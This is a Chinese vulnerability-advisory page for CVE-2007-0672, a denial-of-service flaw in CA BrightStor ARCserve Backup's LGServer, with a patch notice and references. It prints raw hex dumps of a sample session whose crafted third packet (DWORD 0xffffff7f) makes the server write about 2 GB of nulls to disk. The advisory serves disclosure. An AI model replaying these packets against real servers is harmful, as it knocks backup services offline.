漏洞信息详情
CA BrightStor ARCServe BackUp LGServer 安全漏洞
- CNNVD编号:CNNVD-200702-036
- 危害等级: 高危
![图片[1]-CA BrightStor ARCServe BackUp LGServer 安全漏洞-一一网](https://www.proyy.com/skycj/data/images/2021-09-08/bbdd3e8868c10d22861b2275d65f4500.png)
- CVE编号:
CVE-2007-0672
- 漏洞类型:
其他
- 发布时间:
2007-01-11
- 威胁类型:
远程
- 更新时间:
2021-04-08
- 厂 商:
ca - 漏洞来源:
Mark Litchfield※ m… -
漏洞简介
BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。
BrightStor ARCserve Backup在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞导致服务器消耗大量磁盘资源。
每次用户试图验证到LGSERVER.EXE都会在D:CA_BABLDdataServerdata ransfer中创建一个文件。该文件扩展名为.USX,格式类似于RWXXX.usx,其中X为0-9或A-F的值。
在协商期间16进制地址(DWORD)0x15到0x18上的第三个报文中值为0x00 0x00 0x00 0x00,然后是CoreDataDB。如果发送了这个报文,就会将上述内容写入到这个USX文件。但如果在0x15到0x18地址所传送的DWORD值为0xff 0xff 0xff 0x7f,就会向USX文件中写入额外2,096,153KB的NULL,导致拒绝服务。
以下为会话示例:
客户端报文1
Raw Data
4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 (N=, )
00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 ( )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 ff 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
客户端报文2
Raw Data
4e 3d 2c 1b 00 00 00 00 02 00 00 00 00 00 00 00 (N=, )
06 00 00 00 ce 03 00 00 52 57 31 42 34 00 ( RW1B4 )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
客户端报文3
Raw Data
4e 3d 2c 1b 00 00 00 00 03 00 00 00 00 00 00 00 (N=, )
ce 03 00 00 00 00 00 00 43 6f 72 65 44 61 74 61 ( CoreData)
44 42 00 00 01 00 00 00 00 00 0a 00 ce 03 00 00 (DB )
00 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 02 00 00 00 00 00 00 4a 00 00 00 00 00 ( J )
00 01 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( J )
00 00 4a 02 00 00 00 00 00 00 50 00 00 00 00 00 ( J P )
00 01 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 9a 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 ec 02 00 00 00 00 00 00 04 00 00 00 00 00 ( )
00 00 f0 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 42 03 00 00 00 00 00 00 0c 00 00 00 00 00 ( B )
00 00 4e 03 00 00 00 00 00 00 14 00 00 00 00 00 ( N )
00 02 62 03 00 00 00 00 00 00 04 00 00 00 00 00 ( b )
00 00 66 03 00 00 00 00 00 00 12 00 00 00 00 00 ( f )
00 02 78 03 00 00 00 00 00 00 04 00 00 00 00 00 ( x )
00 00 7c 03 00 00 00 00 00 00 0e 00 00 00 00 00 ( | )
00 02 8a 03 00 00 00 00 00 00 17 00 00 00 00 00 ( )
00 00 a1 03 00 00 00 00 00 00 11 00 00 00 00 00 ( )
00 02 b2 03 00 00 00 00 00 00 1c 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00
漏洞公告
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp
参考网址
来源:BUGTRAQ
链接:http://www.securityfocus.com/archive/1/458653/100/0/threaded
来源:CONFIRM
链接:http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp
来源:BID
![[桜井宁宁]COS和泉纱雾超可爱写真福利集-一一网](https://www.proyy.com/skycj/data/images/2020-12-13/4d3cf227a85d7e79f5d6b4efb6bde3e8.jpg)
![[桜井宁宁] 爆乳奶牛少女cos写真-一一网](https://www.proyy.com/skycj/data/images/2020-12-13/d40483e126fcf567894e89c65eaca655.jpg)
